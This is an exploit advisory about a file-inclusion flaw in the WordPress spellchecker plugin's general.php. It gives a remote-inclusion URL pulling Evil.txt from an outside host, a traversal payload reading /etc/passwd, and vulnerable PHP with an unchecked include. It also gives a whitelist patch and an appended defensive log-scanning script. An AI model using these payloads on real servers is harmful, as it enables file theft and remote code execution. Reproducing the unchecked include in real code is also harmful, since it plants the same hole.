WordPress Spellchecker Local File Inclusion / Remote File Inclusion

2011-04-13 / 2011-04-14
Credit: Dr Trojan
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

++ RFI & LFI Wordpress Spellchecker Plugin Vulnerability ++
---------------------------------------------------------------------------------
Released Date = 12/4/2011
---------------------------------------------------------------------------------
Author = Dr Trojan (www.paksecteam.com)
---------------------------------------------------------------------------------
Greets = Sacred1947 - ShozY - Shadow008 - HackerBradri - Death Angel - Yasir Fati
---------------------------------------------------------------------------------
Version = 3.1
---------------------------------------------------------------------------------
Tested On = Windows 7 & Xampp
---------------------------------------------------------------------------------
Rfi Exploit = /general.php?file=http://sitename.com/Evil.txt?
Lfi Exploit = /general.php?file=../../../../../../../etc/passwd
Root Location = wordpress/wp-includes/js/tinymce/plugins/spellchecker/includes/general.php
Web Location = www.sitename.com/general.php?file=

P.O.C:-
RFI Example = www.sitename.com/general.php?file=http://sitename.com/Evil.txt?
LFI Example = www.sitename.com/general.php?file=../../../../../../../etc/passwd

Vulnerability description:-
An attacker might include local or remote PHP files, or read non-PHP files, through this vulnerability. User-tainted data is used to build the name of the file that is included into the current file: PHP code in that file will be evaluated, and non-PHP content will be embedded in the output. This vulnerability can lead to full server compromise.

Vulnerable Example Code =
<?
// the file= query parameter is concatenated into the include path unchecked
include("includes/" . $_GET["file"]);
?>

Patch for vulnerability:
Build a whitelist of permitted file names. Do not only limit the file name to specific paths or extensions.
<?
// only these exact names may be included; anything else ends the request
$files = array("index.php", "main.php");
if(!in_array($_GET["file"], $files)) exit;
?>
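As an added defender-side example (not part of the advisory), the Python below scans Apache access-log lines for requests to the spellchecker's general.php whose file= parameter carries a URL scheme or PHP stream wrapper, a traversal sequence, a null byte, or a name outside the whitelist the advisory's patch suggests. The log lines, client addresses and host example.invalid are constructed, and the whitelist is assumed to be the one in the patch.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache combined-format log lines (not taken from the advisory).
SAMPLE_LOG = """\
203.0.113.5 - - [13/Apr/2011:10:01:02 +0000] "GET /wp-includes/js/tinymce/plugins/spellchecker/includes/general.php?file=main.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [13/Apr/2011:10:01:07 +0000] "GET /wp-includes/js/tinymce/plugins/spellchecker/includes/general.php?file=../../../../../../../etc/passwd HTTP/1.1" 200 1830 "-" "curl/7.21"
198.51.100.7 - - [13/Apr/2011:10:02:11 +0000] "GET /wp-includes/js/tinymce/plugins/spellchecker/includes/general.php?file=http%3A%2F%2Fexample.invalid%2FEvil.txt%3F HTTP/1.1" 200 77 "-" "Mozilla/5.0"
198.51.100.8 - - [13/Apr/2011:10:03:30 +0000] "GET /wp-login.php HTTP/1.1" 200 3000 "-" "Mozilla/5.0"
"""
# Assumed whitelist, mirroring the advisory's suggested patch.
ALLOWED_FILES = {"index.php", "main.php"}

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# Any "scheme:" prefix: http://, ftp://, php://, data:// and similar wrappers.
SCHEME_RE = re.compile(r'^[a-z][a-z0-9+.-]*:', re.IGNORECASE)


def classify_file_param(value):
    """Return why a decoded file= value is suspicious, or None if it is whitelisted."""
    if "\x00" in value:
        return "null-byte"
    if SCHEME_RE.match(value):
        return "url-or-wrapper"
    if ".." in value.replace("\\", "/").split("/"):
        return "path-traversal"
    if value not in ALLOWED_FILES:
        return "not-whitelisted"
    return None


def find_inclusion_attempts(log_text):
    """Scan log lines for general.php requests whose file= parameter looks like an LFI/RFI attempt."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if not url.path.endswith("/general.php"):
            continue
        # parse_qs decodes once; unquote again so %2500-style double encoding is still caught.
        for value in parse_qs(url.query, keep_blank_values=True).get("file", []):
            decoded = unquote(value)
            reason = classify_file_param(decoded)
            if reason:
                hits.append((m.group("ip"), reason, decoded, m.group("status")))
    return hits
```

Running find_inclusion_attempts(SAMPLE_LOG) reports the traversal and the remote-URL requests and ignores the whitelisted main.php request and the unrelated wp-login.php hit.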

